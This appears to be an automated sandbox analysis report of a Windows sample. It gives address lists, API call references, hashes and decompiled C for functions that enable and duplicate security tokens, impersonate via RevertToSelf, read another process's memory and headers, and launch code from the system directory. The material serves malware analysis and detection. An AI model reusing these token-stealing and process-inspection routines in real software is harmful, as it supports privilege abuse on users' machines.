0x006f1b5c
0x006f1b5e
0x006f1b61
0x006f1b65
0x006f1b69
0x006f1b6b
0x006f1b6e
0x006f1b73
0x006f1b73
0x006f1b76
0x006f1b78
0x006f1aeb
0x006f1aef
0x006f1af4
0x006f1af7
0x006f1af9
0x006f1af9
0x006f1aff
0x006f1b02
0x006f1b06
0x006f1b06
0x006f1b09
0x006f1b09
0x006f1b7a
0x006f1b7f
0x006f1b83
0x006f1b86
0x006f1b89
0x006f1b8c
0x006f1b8f
0x006f1b92
0x006f1b95
0x006f1b9d
0x006f1ba8
0x006f1bb2
0x006f1bbc
0x006f1bbf
0x006f1cd5
0x006f1cda
0x006f1cdc
0x006f1d12
0x006f1d15
0x006f1d1c
0x006f1d1f
0x006f1d24
0x006f1d26
0x006f1d28
0x006f1d30
0x006f1d31
0x006f1d31
0x00000000
0x006f1d28
0x006f1cde
0x00000000
0x006f1bc5
0x006f1bc5
0x006f1bc6
0x006f1bcd
0x006f1bd1
0x006f1bd5
0x006f1bd7
0x006f1cea
0x006f1cee
0x006f1cf1
0x00000000
0x006f1cf1
0x006f1bdd
0x006f1be5
0x006f1bea
0x006f1bee
0x006f1bfe
0x006f1cfa
0x006f1cfd
0x006f1d03
0x006f1d04
0x006f1d09
0x00000000
0x006f1d09
0x006f1c0a
0x006f1c0f
0x006f1c15
0x006f1c17
0x006f1c1b
0x006f1c21
0x006f1d3b
0x006f1d40
0x006f1d41
0x006f1d48
0x006f1d4a
0x006f1d4d
0x00000000
0x006f1d4d
0x006f1c31
0x006f1c36
0x006f1c44
0x006f1d58
0x006f1d5a
0x006f1d5c
0x006f1ce2
0x006f1ce2
0x00000000
0x006f1ce2
0x006f1d5e
0x006f1d61
0x00000000
0x00000000
0x006f1d67
0x006f1d6c
0x006f1d6c
0x006f1d6d
0x006f1d6d
0x006f1d6d
0x006f1d70
0x006f1d76
0x00000000
0x00000000
0x006f1d7b
0x006f1d7d
0x006f1d7f
0x00000000
0x00000000
0x00000000
0x006f1d7f
0x006f1d81
0x006f1d84
0x006f1d8a
0x00000000
0x00000000
0x006f1d93
0x006f1d98
0x006f1d9b
0x006f1da2
0x006f1da5
0x006f1da8
0x006f1dac
0x006f1dae
0x006f1a8e
0x006f1a8e
0x006f1a90
0x006f1a90
0x006f1a92
0x00000000
0x00000000
0x006f1aa7
0x006f1aac
0x006f1aaf
0x006f1ab1
0x006f1ab3
0x006f1ab5
0x006f1ab8
0x006f1abb
0x006f1ac6
0x006f1ac9
0x006f1ad0
0x006f1ad2
0x006f1ad5
0x006f1ad5
0x006f1ad5
0x006f1ad5
0x006f1ada
0x006f1add
0x006f1e05
0x006f1e07
0x00000000
0x006f1e1a
0x006f1e21
0x006f1e2a
0x006f1e2e
0x006f1e33
0x006f1e36
0x006f1e4a
0x006f1e55
0x006f1ed3
0x006f1ed3
0x00000000
0x006f1ed3
0x006f1e5c
0x006f1e5f
0x006f1e62
0x006f1e87
0x006f1e8c
0x006f1e8f
0x006f1e91
0x00000000
0x00000000
0x006f1e93
0x006f1ea2
0x006f1ea5
0x006f1eaa
0x006f1ead
0x006f1eb3
0x006f1eb7
0x006f1eba
0x006f1ebd
0x006f1e68
0x006f1e76
0x006f1ec2
0x006f1ec2
0x006f1ec8
0x006f1ecb
0x006f1ed0
0x006f1ed0
0x006f1ec8
0x00000000
0x006f1e62
0x006f1e07
0x006f1db4
0x006f1db7
0x006f1db7
0x006f1db9
0x006f1db9
0x006f1dbd
0x006f1dc0
0x00000000
0x00000000
0x006f1dc6
0x006f1dc7
0x006f1dc9
0x00000000
0x00000000
0x00000000
0x006f1dcb
0x00000000
0x006f1db9
0x006f1c51
0x006f1c56
0x006f1c60
0x006f1c62
0x006f1c67
0x006f1c95
0x006f1c98
0x006f1c9a
0x006f1c9d
0x006f1ca2
0x006f1dd9
0x006f1ddb
0x006f1e00
0x006f1e00
0x006f1e01
0x006f1ddd
0x006f1df6
0x006f1dfb
0x006f1dfb
0x006f1e03
0x00000000
0x006f1e03
0x006f1ca8
0x006f1cc5
0x006f1cc6
0x006f1cc9
0x006f1cce
0x00000000
0x00000000
0x00000000
0x006f1cd0
0x006f1dd6
0x00000000
0x006f1dd6
0x006f1c6d
0x006f1c7b
0x006f1c81
0x006f1c85
0x006f1c8a
0x006f1c8f
0x00000000
0x00000000
0x00000000
0x006f1c8f
0x006f1ed5
0x006f1ed5
0x006f1ed8
0x006f1edb
0x006f1ee6
0x006f1ee8
0x006f1eec
0x006f1eef
0x006f1ef4
0x006f1ef4
0x006f1ef7
0x006f1efc
0x006f1eff
0x006f1f04
0x006f1f04
0x006f1f07
0x006f1f0c
0x006f1f0f
0x006f1f14
0x006f1f14
0x006f1f17
0x006f1f1c
0x006f1f1f
0x006f1f24
0x006f1f24
0x006f1f27
0x006f1f2c
0x006f1f2f
0x006f1f34
0x006f1f34
0x006f1f38
0x006f1f3d
0x00000000
0x006f1ee6

APIs

lstrcmpiW.KERNEL32(?,?,00000014,0000000C), ref: 006F1BFA
lstrcmpiW.KERNEL32(?,?), ref: 006F1C15

Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0

lstrcmpiW.KERNEL32(?,?), ref: 006F1C40
lstrcmpiW.KERNEL32(?,?), ref: 006F1C60
lstrcmpiW.KERNEL32(?,?), ref: 006F1C7B
lstrcmpiW.KERNEL32(?,?), ref: 006F1CB4
CreateThread.KERNEL32(00000000,00000000,006F13A0,?,00000000,?), ref: 006F1E4A

Strings

D, xrefs: 006F1C6D

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: lstrcmpi$Heap$AllocateCreateProcessThread
String ID: D
API String ID: 4198123405-2746444292
Opcode ID: d88271703f89e8d8aad688e29102cc87d933105758ad3385caa03b7b81011480
Instruction ID: e6269c079b698695564c052951517b15e5c5af3f54ea9fbeef15a6b5d7224656
Opcode Fuzzy Hash: d88271703f89e8d8aad688e29102cc87d933105758ad3385caa03b7b81011480
Instruction Fuzzy Hash: 37E19DB5A0430AEFD714DF29C881A6AB7EABF85384F04442CEA45CB352EB31ED15CB51

Uniqueness

Uniqueness Score: -1.00%

Function 006E8CD0, Relevance: 13.6, APIs: 9, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E006E8CD0(void* __ecx) {
				void** _v12;
				char _v204;
				struct _LUID _v216;
				char _v220;
				struct _TOKEN_PRIVILEGES _v236;
				long _v240;
				int _v244;
				char _v248;
				void* _v252;
				void* _v256;
				int _v260;
				void* _v268;
				intOrPtr _v276;
				intOrPtr* _t29;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t34;
				void* _t43;
				intOrPtr* _t44;
				struct _TOKEN_PRIVILEGES* _t49;
				intOrPtr* _t58;
				void* _t62;
				intOrPtr _t64;
				WCHAR* _t68;
				HANDLE* _t69;
				intOrPtr _t71;

				_t69 =  &_v256;
				_v252 = 0xffffffff;
				_t71 =  *0x6f9c00; // 0x73e71f81
				_v244 = 0;
				_v256 = 0;
				_v248 = 0;
				_v260 = 0;
				if(_t71 != 0) {
					L2:
					_v240 = 0;
					if(OpenProcessToken(GetCurrentProcess(), 0x28, _t69) != 0) {
						_t68 =  &_v204;
						E006F4520(_t68, 0x5f);
						if(LookupPrivilegeValueW(0, _t68,  &_v216) != 0) {
							_t49 =  &_v220;
							_t49->PrivilegeCount = 1;
							_t49->Privileges[0].Luid = 2;
							AdjustTokenPrivileges(_v260, 0, _t49, 0x10,  &_v236,  &_v240);
						}
					}
					_t29 =  *0x6f9c4c; // 0x73e74023
					if(_t29 == 0) {
						L16:
						_t30 =  *0x6f9b80; // 0x0
						if(_t30 == 0) {
							L21:
							_t31 = _v260;
							if(_t31 == 0) {
								L23:
								return _t31;
							}
							AdjustTokenPrivileges(_t31, 0,  &_v236, 0x10, 0, 0);
							return CloseHandle(_v260);
						}
						_t34 =  *_t30();
						_t64 = _t34;
						if(_t34 == 0xffffffff) {
							goto L21;
						}
						L18:
						RevertToSelf();
						_push( &_v252);
						_push(_t64);
						if( *0x6f9c00() != 0 && DuplicateTokenEx(_v260, 0x2000000, 0, 1, 1,  &_v252) != 0) {
							CloseHandle(_v268);
							 *_v12 = _v260;
						}
						goto L21;
					}
					_push( &_v248);
					_push( &_v256);
					_push(1);
					_push(0);
					_push(0);
					if( *_t29() == 0) {
						goto L16;
					}
					_t43 = _v268;
					_t64 = 0xffffffffffffffff;
					if(_t43 == 0) {
						L13:
						_t44 =  *0x6f9be8; // 0x73e71b65
						if(_t44 != 0) {
							 *_t44(_v276);
						}
						if(_t64 != 0xffffffff) {
							goto L18;
						} else {
							goto L16;
						}
					}
					_t62 = 0;
					_t58 = _v276 + 8;
					while( *_t58 != 0) {
						_t62 = _t62 + 1;
						_t58 = _t58 + 0xc;
						if(_t62 < _t43) {
							continue;
						}
						goto L13;
					}
					_t64 =  *((intOrPtr*)(_t58 - 8));
					goto L13;
				}
				_t31 = E006F18C0(__ecx, _t71);
				if(_t31 == 0) {
					goto L23;
				}
				goto L2;
			}

0x006e8cd1
0x006e8cd9
0x006e8ce1
0x006e8ce7
0x006e8ceb
0x006e8cef
0x006e8cf3
0x006e8cf6
0x006e8d05
0x006e8d05
0x006e8d21
0x006e8d23
0x006e8d2a
0x006e8d42
0x006e8d44
0x006e8d50
0x006e8d56
0x006e8d68
0x006e8d68
0x006e8d42
0x006e8d6e
0x006e8d75
0x006e8dc7
0x006e8dc7
0x006e8dce
0x006e8e25
0x006e8e25
0x006e8e2a
0x006e8e4f
0x006e8e4f
0x006e8e4f
0x006e8e39
0x00000000
0x006e8e42
0x006e8dd0
0x006e8dd2
0x006e8dd7
0x00000000
0x00000000
0x006e8dd9
0x006e8dd9
0x006e8de3
0x006e8de4
0x006e8ded
0x006e8e19
0x006e8e23
0x006e8e23
0x00000000
0x006e8ded
0x006e8d81
0x006e8d82
0x006e8d83
0x006e8d85
0x006e8d86
0x006e8d8b
0x00000000
0x00000000
0x006e8d8d
0x006e8d93
0x006e8d96
0x006e8db3
0x006e8db3
0x006e8dba
0x006e8dc0
0x006e8dc0
0x006e8dc5
0x00000000
0x00000000
0x00000000
0x00000000
0x006e8dc5
0x006e8d9c
0x006e8d9e
0x006e8da1
0x006e8da6
0x006e8da7
0x006e8dac
0x00000000
0x00000000
0x00000000
0x006e8dae
0x006e8db0
0x00000000
0x006e8db0
0x006e8cf8
0x006e8cff
0x00000000
0x00000000
0x00000000

APIs

GetCurrentProcess.KERNEL32 ref: 006E8D0D
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 006E8D19
LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E8D3A
AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,?,?), ref: 006E8D68
RevertToSelf.ADVAPI32 ref: 006E8DD9
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 006E8E04
CloseHandle.KERNEL32(FFFFFFFF), ref: 006E8E19

Part of subcall function 006F18C0: LoadLibraryW.KERNEL32(?), ref: 006F18DC
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F18FD
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1911
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1925
Part of subcall function 006F18C0: GetProcAddress.KERNEL32(00000000), ref: 006F1939

AdjustTokenPrivileges.ADVAPI32(00000000,00000000,?,00000010,00000000,00000000), ref: 006E8E39
CloseHandle.KERNEL32 ref: 006E8E42

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: AddressProcToken$AdjustCloseHandlePrivilegesProcess$CurrentDuplicateLibraryLoadLookupOpenPrivilegeRevertSelfValue
String ID:
API String ID: 1504140195-0
Opcode ID: 3deed42daf808f47cc89e5a8f8c5f9ebb9548f891df5752acad236164fd4b69f
Instruction ID: 06014b9fde9fc0a1f32d3923b0f198a0070932032434291c8b11ee7d9a7e789e
Opcode Fuzzy Hash: 3deed42daf808f47cc89e5a8f8c5f9ebb9548f891df5752acad236164fd4b69f
Instruction Fuzzy Hash: 52413A70205342AFE724DF61DC09BAA7BEAEF84750F00491CB599D72E0EB70D845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 006F1800, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E006F1800(void* _a4) {
				intOrPtr _v236;
				long _v276;
				intOrPtr _v280;
				void _v340;
				void _v348;
				void* _v360;
				void* _v372;
				void _v380;
				void* _t25;
				DWORD* _t28;
				void* _t29;
				union _PROCESSINFOCLASS _t30;
				DWORD* _t32;

				_t29 = _a4;
				_t30 = 0;
				if(NtQueryInformationProcess(_t29, 0,  &_v348, 0x18, 0) >= 0) {
					_t25 =  &_v276;
					 *_t25 = 0;
					if(ReadProcessMemory(_t29, _v360,  &_v380, 0x10, _t25) != 0 && _v276 == 0x10) {
						_v276 = 0;
						if(ReadProcessMemory(_t29, _v372,  &_v340, 0x40, _t25) != 0 && _v276 == 0x40) {
							_t28 = _t32;
							 *_t28 = 0;
							if(ReadProcessMemory(_t29, _v372 + _v280, _t25, 0xf8, _t28) != 0 &&  *_t32 == 0xf8) {
								_t30 = _v372 + _v236;
							}
						}
					}
				}
				return _t30;
			}

0x006f1809
0x006f1810
0x006f1824
0x006f182e
0x006f1836
0x006f184a
0x006f1857
0x006f1871
0x006f187e
0x006f1880
0x006f189b
0x006f18aa
0x006f18aa
0x006f189b
0x006f1871
0x006f184a
0x006f18bc

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 006F181C
ReadProcessMemory.KERNEL32(?,?,?,00000010,?), ref: 006F1842
ReadProcessMemory.KERNEL32(?,?,?,00000040,?), ref: 006F1869
ReadProcessMemory.KERNEL32(?,?,?,000000F8), ref: 006F1893

Strings

@, xrefs: 006F1873

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Process$MemoryRead$InformationQuery
String ID: @
API String ID: 3059065599-2766056989
Opcode ID: 5f94ef4c783476edeee355da09100aa9ebb030eb658e16a539ad8fbcf69da103
Instruction ID: 53873b1e3f57043a97c50038fb36dd6f151faf0149bc0d3815f174ef36386e70
Opcode Fuzzy Hash: 5f94ef4c783476edeee355da09100aa9ebb030eb658e16a539ad8fbcf69da103
Instruction Fuzzy Hash: 7B112C71604305AFF720CB15DC84FBB7BEDEB85799F008518FA659A280D770A804DB76

Uniqueness

Uniqueness Score: -1.00%

Function 006E4DE0, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E006E4DE0(signed int __ecx) {
				intOrPtr _t91;
				signed int _t98;
				signed int _t100;
				intOrPtr _t102;
				signed int _t105;
				signed int _t107;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;
				signed int _t118;
				signed int _t119;
				signed int _t122;
				signed int _t123;
				signed int _t125;
				signed int _t129;
				intOrPtr _t130;
				intOrPtr _t132;
				signed int _t133;
				signed int _t137;
				signed int _t138;
				signed int _t140;
				signed int _t144;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t151;
				signed int _t153;
				signed int _t155;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int* _t172;
				signed int* _t174;
				signed int* _t175;
				signed int* _t176;
				signed int* _t177;

				_t91 =  *0x6f9b0c; // 0x2ef350
				_t153 = 0;
				_t167 = __ecx;
				_t172[1] = 0;
				_t172[3] = 0;
				_t172[5] = 0;
				 *(_t91 + 8) = 6;
				_t5 = _t91 + 0x24; // 0x0
				_t132 =  *_t5;
				if(_t132 == 0) {
					 *(_t91 + 8) = 2;
					_t129 = 0;
					goto L15;
				} else {
					_t98 = 0xfffffffe;
					_t155 = 1;
					while( *((short*)(_t132 + _t155 * 2 - 2)) != 0) {
						_t155 = _t155 + 1;
						_t98 = _t98 + 0xfffffffe;
						if(_t155 != 0x80000000) {
							continue;
						}
						_t129 = 0;
						_t166 = 0;
						_t153 = 0;
						L24:
						_t92 = _t172[1];
						if(_t172[1] != 0) {
							E006E91E0(_t92);
							_t172 =  &(_t172[1]);
						}
						if(_t153 != 0) {
							E006E91E0(_t166);
							_t172 =  &(_t172[1]);
						}
						_t93 = _t172[3];
						if(_t172[3] != 0) {
							E006E91E0(_t93);
						}
						return _t129;
					}
					_t129 = 0;
					_t100 = E006E3180( ~_t98, 0);
					_t172 =  &(_t172[2]);
					_t166 = _t100;
					__eflags = _t100;
					if(_t100 == 0) {
						_t153 = _t166;
						L15:
						_t166 = 0;
						goto L24;
					}
					__eflags = _t155;
					if(_t155 <= 0) {
						_t129 = 0;
						__eflags = _t155;
						if(_t155 != 0) {
							 *_t166 = 0;
						}
						L23:
						_t153 = _t166;
						goto L24;
					}
					_t10 = _t155 - 1; // 0x0
					_t133 = 0;
					_t144 = 2;
					_t172[6] = _t167;
					_t172[2] = _t10;
					_t102 =  *0x6f9b0c; // 0x2ef350
					_t13 = _t102 + 0x24; // 0x0
					_t130 =  *_t13;
					_t172[4] = 1;
					_t105 = 0;
					__eflags = 0;
					while(1) {
						_t168 =  *(_t130 + _t105 * 2) & 0x0000ffff;
						__eflags = _t168;
						if(_t168 == 0) {
							break;
						}
						 *(_t166 + _t105 * 2) = _t168;
						_t144 = _t144 + 0xfffffffe;
						_t133 = _t133 + 0xfffffffe;
						__eflags = _t155 - 1;
						_t155 = _t155 - 1;
						if(__eflags == 0) {
							L12:
							__eflags = _t155;
							_t143 =  ==  ?  ~_t144 :  ~_t133;
							 *((short*)(_t166 + ( ==  ?  ~_t144 :  ~_t133))) = 0;
							if(_t155 != 0) {
								L19:
								_t169 = _t172[6];
								_t107 = E006F08A0( &(_t172[5]), _t166, _t172[4],  &(_t172[3]),  &(_t172[5]));
								__eflags = _t107;
								if(_t107 == 0) {
									L21:
									_t108 =  *0x6f9b0c; // 0x2ef350
									 *(_t108 + 8) = 2;
									L22:
									_t129 = 0;
									__eflags = 0;
									goto L23;
								}
								_t109 = _t172[5];
								__eflags = _t109 - 1 - 0x1fffe;
								if(_t109 - 1 < 0x1fffe) {
									_t110 = E006EC380(_t172[6], 0,  &(_t172[1]), _t109);
									_t172 =  &(_t172[4]);
									_t129 = 0;
									__eflags = _t110;
									if(_t110 == 0) {
										goto L23;
									}
									_t156 =  &(_t172[0x49]);
									_t111 = GetSystemDirectoryW( &(_t172[0x49]), 0x104);
									__eflags = _t111;
									if(_t111 == 0) {
										goto L23;
									}
									 *((intOrPtr*)(_t172 + 0x124 + _t111 * 2)) = 0x5c;
									E006F4520(_t172 + 0x126 + _t111 * 2, 0x5c);
									_t174 =  &(_t172[2]);
									__eflags =  *0x6f9ae8;
									if( *0x6f9ae8 == 0) {
										L58:
										_t114 = E006F6E60(0, _t156, _t174[1]);
										_t172 =  &(_t174[3]);
										__eflags = _t114;
										_t172[4] = _t114;
										if(_t114 == 0) {
											goto L23;
										}
										L59:
										_t115 =  *0x6f9b0c; // 0x2ef350
										 *((intOrPtr*)(_t115 + 8)) = 1;
										E006F4520( &(_t172[9]), 0x5e);
										_t175 =  &(_t172[2]);
										_push(_t175[1]);
										E006F4610(_t169, 0xe,  &(_t172[9]));
										_t172 =  &(_t175[4]);
										_t129 = _t172[4];
										goto L23;
									}
									_t158 = 0xfffffc00;
									_t118 = E006E3180(0x800, 0);
									_t176 =  &(_t174[2]);
									_t146 = _t118;
									while(1) {
										_t137 =  *(_t176 + 0x924 + _t158 * 2) & 0x0000ffff;
										_t119 = _t158;
										__eflags = _t137;
										if(_t137 == 0) {
											break;
										}
										 *(_t146 + 0x800 + _t119 * 2) = _t137;
										_t158 = _t119 + 1;
										__eflags = _t158;
										if(_t158 != 0) {
											continue;
										}
										 *(_t146 + 0x800 + _t119 * 2) = 0;
										L54:
										_t162 = 0;
										__eflags = 0;
										L55:
										__eflags = _t147;
										if(_t147 != 0) {
											E006E91E0(_t147);
											_t172 =  &(_t172[1]);
										}
										__eflags = _t162;
										_t156 =  &(_t172[0x49]);
										if(_t162 != 0) {
											goto L59;
										} else {
											goto L58;
										}
									}
									 *(_t146 + 0x800 + _t119 * 2) = 0;
									_t176[2] = _t146;
									E006F4520( &(_t176[9]), 0x5d);
									_t147 = _t176[2];
									_t177 =  &(_t176[2]);
									_t122 = 0x400;
									_t138 = _t147;
									while(1) {
										__eflags =  *_t138;
										if( *_t138 == 0) {
											break;
										}
										_t138 = _t138 + 2;
										_t122 = _t122 - 1;
										__eflags = _t122;
										if(_t122 != 0) {
											continue;
										}
										L46:
										_t123 = 0x400;
										_t177[2] = _t177[1];
										_t140 = _t147;
										while(1) {
											__eflags =  *_t140;
											if( *_t140 == 0) {
												break;
											}
											_t140 = _t140 + 2;
											_t123 = _t123 - 1;
											__eflags = _t123;
											if(_t123 != 0) {
												continue;
											}
											goto L54;
										}
										_t149 = 0;
										__eflags = 0;
										while(1) {
											_t161 = _t149;
											_t151 =  *(_t177[2] + _t161 * 2) & 0x0000ffff;
											__eflags = _t151;
											if(_t151 == 0) {
												break;
											}
											 *(_t140 + _t161 * 2) = _t151;
											_t73 = _t161 + 1; // 0x1
											_t149 = _t73;
											__eflags = _t123 - _t149;
											if(_t123 != _t149) {
												continue;
											}
											_t147 =  *_t177;
											 *(_t140 + _t161 * 2) = 0;
											goto L54;
										}
										 *(_t140 + _t161 * 2) = 0;
										_t162 = 0;
										_push(0);
										_push(0);
										_push(0x420);
										_push(_t177[3]);
										_push( &(_t177[7]));
										_t125 = E006E5470( &(_t177[8]));
										_t147 = _t177[6];
										_t172 =  &(_t177[6]);
										__eflags = _t125;
										if(_t125 != 0) {
											CloseHandle(_t172[8]);
											CloseHandle(_t172[7]);
											_t147 =  *_t172;
											_t162 = 1;
										}
										goto L55;
									}
									_t159 = 0;
									__eflags = 0;
									while(1) {
										_t148 = _t159;
										_t160 =  *(_t177 + 0x24 + _t159 * 2) & 0x0000ffff;
										__eflags = _t160;
										if(_t160 == 0) {
											break;
										}
										 *(_t138 + _t148 * 2) = _t160;
										_t63 = _t148 + 1; // 0x1
										_t159 = _t63;
										__eflags = _t122 - _t159;
										if(_t122 != _t159) {
											continue;
										}
										break;
									}
									 *(_t138 + _t148 * 2) = 0;
									_t147 =  *_t177;
									goto L46;
								}
								goto L21;
							}
							goto L22;
						}
						__eflags = _t105 - 0x7ffffffd;
						_t105 = _t105 + 1;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					 *(_t166 + _t105 * 2) = 0;
					goto L19;
				}
			}

0x006e4dea
0x006e4def
0x006e4df1
0x006e4df3
0x006e4df7
0x006e4dfb
0x006e4dff
0x006e4e06
0x006e4e06
0x006e4e0b
0x006e4e34
0x006e4e3b
0x00000000
0x006e4e0d
0x006e4e0f
0x006e4e14
0x006e4e15
0x006e4e1d
0x006e4e1e
0x006e4e27
0x00000000
0x00000000
0x006e4e29
0x006e4e2b
0x006e4e2d
0x006e4f0b
0x006e4f0b
0x006e4f11
0x006e4f14
0x006e4f19
0x006e4f19
0x006e4f1e
0x006e4f21
0x006e4f26
0x006e4f26
0x006e4f29
0x006e4f2f
0x006e4f32
0x006e4f37
0x006e4f46
0x006e4f46
0x006e4e3f
0x006e4e45
0x006e4e4a
0x006e4e4d
0x006e4e4f
0x006e4e51
0x006e4eb4
0x006e4eb6
0x006e4eb6
0x00000000
0x006e4eb6
0x006e4e53
0x006e4e55
0x006e4eba
0x006e4ebc
0x006e4ebe
0x006e4ec0
0x006e4ec0
0x006e4f09
0x006e4f09
0x00000000
0x006e4f09
0x006e4e57
0x006e4e5a
0x006e4e5c
0x006e4e61
0x006e4e65
0x006e4e69
0x006e4e6e
0x006e4e6e
0x006e4e74
0x006e4e78
0x006e4e78
0x006e4e7a
0x006e4e7a
0x006e4e7e
0x006e4e81
0x00000000
0x00000000
0x006e4e83
0x006e4e87
0x006e4e8a
0x006e4e90
0x006e4e92
0x006e4e95
0x006e4ea1
0x006e4ea5
0x006e4ea7
0x006e4eaa
0x006e4eb0
0x006e4ecd
0x006e4ecd
0x006e4ee3
0x006e4ee8
0x006e4eea
0x006e4efb
0x006e4efb
0x006e4f00
0x006e4f07
0x006e4f07
0x006e4f07
0x00000000
0x006e4f07
0x006e4eec
0x006e4ef3
0x006e4ef9
0x006e4f53
0x006e4f58
0x006e4f5b
0x006e4f5d
0x006e4f5f
0x00000000
0x00000000
0x006e4f61
0x006e4f6e
0x006e4f74
0x006e4f76
0x00000000
0x00000000
0x006e4f78
0x006e4f8d
0x006e4f92
0x006e4f95
0x006e4f9c
0x006e5097
0x006e509e
0x006e50a3
0x006e50a6
0x006e50a8
0x006e50ac
0x00000000
0x00000000
0x006e50b2
0x006e50b2
0x006e50bb
0x006e50c5
0x006e50ca
0x006e50cd
0x006e50d5
0x006e50da
0x006e50dd
0x00000000
0x006e50dd
0x006e4fa2
0x006e4fae
0x006e4fb3
0x006e4fb6
0x006e4fb8
0x006e4fb8
0x006e4fc0
0x006e4fc2
0x006e4fc5
0x00000000
0x00000000
0x006e4fc9
0x006e4fd1
0x006e4fd1
0x006e4fd2
0x00000000
0x00000000
0x006e4fd4
0x006e507d
0x006e507d
0x006e507d
0x006e507f
0x006e507f
0x006e5081
0x006e5084
0x006e5089
0x006e5089
0x006e508c
0x006e508e
0x006e5095
0x00000000
0x00000000
0x00000000
0x00000000
0x006e5095
0x006e4fe3
0x006e4ff4
0x006e4ff8
0x006e4ffd
0x006e5001
0x006e5004
0x006e5009
0x006e500b
0x006e500b
0x006e500f
0x00000000
0x00000000
0x006e5011
0x006e5014
0x006e5014
0x006e5015
0x00000000
0x00000000
0x006e503b
0x006e503f
0x006e5044
0x006e5048
0x006e504a
0x006e504a
0x006e504e
0x00000000
0x00000000
0x006e5050
0x006e5053
0x006e5053
0x006e5054
0x00000000
0x00000000
0x00000000
0x006e5056
0x006e5058
0x006e5058
0x006e505a
0x006e505a
0x006e5060
0x006e5064
0x006e5067
0x00000000
0x00000000
0x006e5069
0x006e506d
0x006e506d
0x006e5070
0x006e5072
0x00000000
0x00000000
0x006e5074
0x006e5077
0x00000000
0x006e5077
0x006e50e6
0x006e50ec
0x006e50f6
0x006e50f7
0x006e50f8
0x006e50fd
0x006e5101
0x006e5103
0x006e5108
0x006e510c
0x006e510f
0x006e5111
0x006e5121
0x006e5127
0x006e5129
0x006e512e
0x006e512e
0x00000000
0x006e5111
0x006e5019
0x006e5019
0x006e501b
0x006e501b
0x006e501d
0x006e5022
0x006e5025
0x00000000
0x00000000
0x006e5027
0x006e502b
0x006e502b
0x006e502e
0x006e5030
0x00000000
0x00000000
0x00000000
0x006e5030
0x006e5032
0x006e5038
0x00000000
0x006e5038
0x00000000
0x006e4ef9
0x00000000
0x006e4eb2
0x006e4e97
0x006e4e9c
0x006e4e9f
0x00000000
0x00000000
0x00000000
0x006e4e9f
0x006e4ec7
0x00000000
0x006e4ec7

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 006E4F6E
CloseHandle.KERNEL32(?), ref: 006E5121
CloseHandle.KERNEL32(?), ref: 006E5127

Strings

\, xrefs: 006E4F78

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: CloseHandle$DirectorySystem
String ID: \
API String ID: 1693769833-2967466578
Opcode ID: 91c23db3a6717debfe3cf5897fb3ea98c1adb1068a680118d0cfa9c1a0ca6f8a
Instruction ID: da104fd815fa6c7c3a60b87a64823a400c75ceea21d6028f3ac3aa41570a1b92
Opcode Fuzzy Hash: 91c23db3a6717debfe3cf5897fb3ea98c1adb1068a680118d0cfa9c1a0ca6f8a
Instruction Fuzzy Hash: 6591E0716093429BD7209F2AD844BABB3E7AFD0708F14852CF589873A1EB71D946C792

Uniqueness

Uniqueness Score: -1.00%

Function 006F2F10, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

